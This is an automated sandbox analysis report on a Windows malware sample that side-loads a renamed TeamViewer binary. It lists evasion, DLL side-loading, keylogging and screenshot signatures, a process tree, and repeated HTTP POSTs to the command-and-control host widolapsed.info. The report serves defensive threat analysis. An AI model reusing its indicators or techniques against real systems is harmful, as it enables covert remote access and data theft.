Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report wogZe27GBB

Overview

General Information

Sample Name:wogZe27GBB (renamed file extension from none to exe)
Analysis ID:483790
MD5:5efc68abd7fec415e34980d95a06a66a
SHA1:34b243a0b3e322b8983b528caa5849395360a91d
SHA256:0f655a8ac0d7fdc7ac44fdd9799129848faf9c73bfa0e108fd903de439447232
Tags:exeMappingOOOsigned
Infos:

Most interesting Screenshot:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:17
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • wogZe27GBB.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\wogZe27GBB.exe' MD5: 5EFC68ABD7FEC415E34980D95A06A66A)
    • UniPrint.exe (PID: 6532 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6736 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • svchost.exe (PID: 6992 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7052 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7064 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7104 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4884 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4600 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3888 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3864 cmdline: c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'uniprint.exe' -s USBManager MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 3348 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6028 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • UniPrint.exe (PID: 6252 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4912 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 6524 cmdline: 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' f MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • UniPrint.exe (PID: 4420 cmdline: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe MD5: EBDBA07BFABCF24F5D79EF27247EA643)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: wogZe27GBB.exeReversingLabs: Detection: 71%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllReversingLabs: Detection: 51%
Source: 0.2.wogZe27GBB.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen2
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0049B32E __EH_prolog3,CryptGenRandom,4_2_0049B32E
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,4_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_006F605B CryptReleaseContext,4_2_006F605B
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: wogZe27GBB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
EXE planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\Desktop\wogZe27GBB.exeEXE: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeJump to behavior
DLL planting / hijacking vulnerabilities foundShow sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINSTA.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SHFolder.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: VERSION.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: version.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: MPR.dll
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: SHFOLDER.DLLJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\wogZe27GBB.exeDLL: CLDAPI.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeDLL: msimg32.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.3:49752 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: wogZe27GBB.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp, svchost.exe, 0000000D.00000002.516408588.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.351085287.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355552090.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.373259727.000000007098C000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000002.381228039.000000007098C000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb< source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,2_2_70982EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,2_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,4_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,4_2_70982EF0
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76431Content-Type: multipart/form-data; boundary=--------3259937207User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76426Content-Type: multipart/form-data; boundary=--------974736809User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81223Content-Type: multipart/form-data; boundary=--------1733772180User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81262Content-Type: multipart/form-data; boundary=--------3571177622User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81298Content-Type: multipart/form-data; boundary=--------3135628383User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83326Content-Type: multipart/form-data; boundary=--------2112300367User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83305Content-Type: multipart/form-data; boundary=--------1747900146User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83526Content-Type: multipart/form-data; boundary=--------4043093276User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81257Content-Type: multipart/form-data; boundary=--------4228739266User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81331Content-Type: multipart/form-data; boundary=--------3803026718User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 81307Content-Type: multipart/form-data; boundary=--------2963325791User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85135Content-Type: multipart/form-data; boundary=--------2571491142User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 82926Content-Type: multipart/form-data; boundary=--------3335732562User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 83052Content-Type: multipart/form-data; boundary=--------1291895716User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76682Content-Type: multipart/form-data; boundary=--------1315708494User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76660Content-Type: multipart/form-data; boundary=--------3047557173User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76627Content-Type: multipart/form-data; boundary=--------3142017803User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76637Content-Type: multipart/form-data; boundary=--------2197444700User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76633Content-Type: multipart/form-data; boundary=--------327613734User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76617Content-Type: multipart/form-data; boundary=--------3156620313User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------2353964795User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------2524520363User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76647Content-Type: multipart/form-data; boundary=--------776738021User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76598Content-Type: multipart/form-data; boundary=--------1255899435User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76639Content-Type: multipart/form-data; boundary=--------3577760510User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76833Content-Type: multipart/form-data; boundary=--------4017631281User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76635Content-Type: multipart/form-data; boundary=--------3576073818User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76584Content-Type: multipart/form-data; boundary=--------2060090614User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76670Content-Type: multipart/form-data; boundary=--------1263745405User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76644Content-Type: multipart/form-data; boundary=--------3327901999User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76640Content-Type: multipart/form-data; boundary=--------1002864139User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76582Content-Type: multipart/form-data; boundary=--------795614568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76736Content-Type: multipart/form-data; boundary=--------572333967User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76592Content-Type: multipart/form-data; boundary=--------3756762824User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76612Content-Type: multipart/form-data; boundary=--------4010773262User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------1730318477User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76649Content-Type: multipart/form-data; boundary=--------2667398164User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76622Content-Type: multipart/form-data; boundary=--------2156489369User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76630Content-Type: multipart/form-data; boundary=--------271647860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76597Content-Type: multipart/form-data; boundary=--------2981659231User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76646Content-Type: multipart/form-data; boundary=--------3817058548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76655Content-Type: multipart/form-data; boundary=--------1585944860User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 76672Content-Type: multipart/form-data; boundary=--------1049848244User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
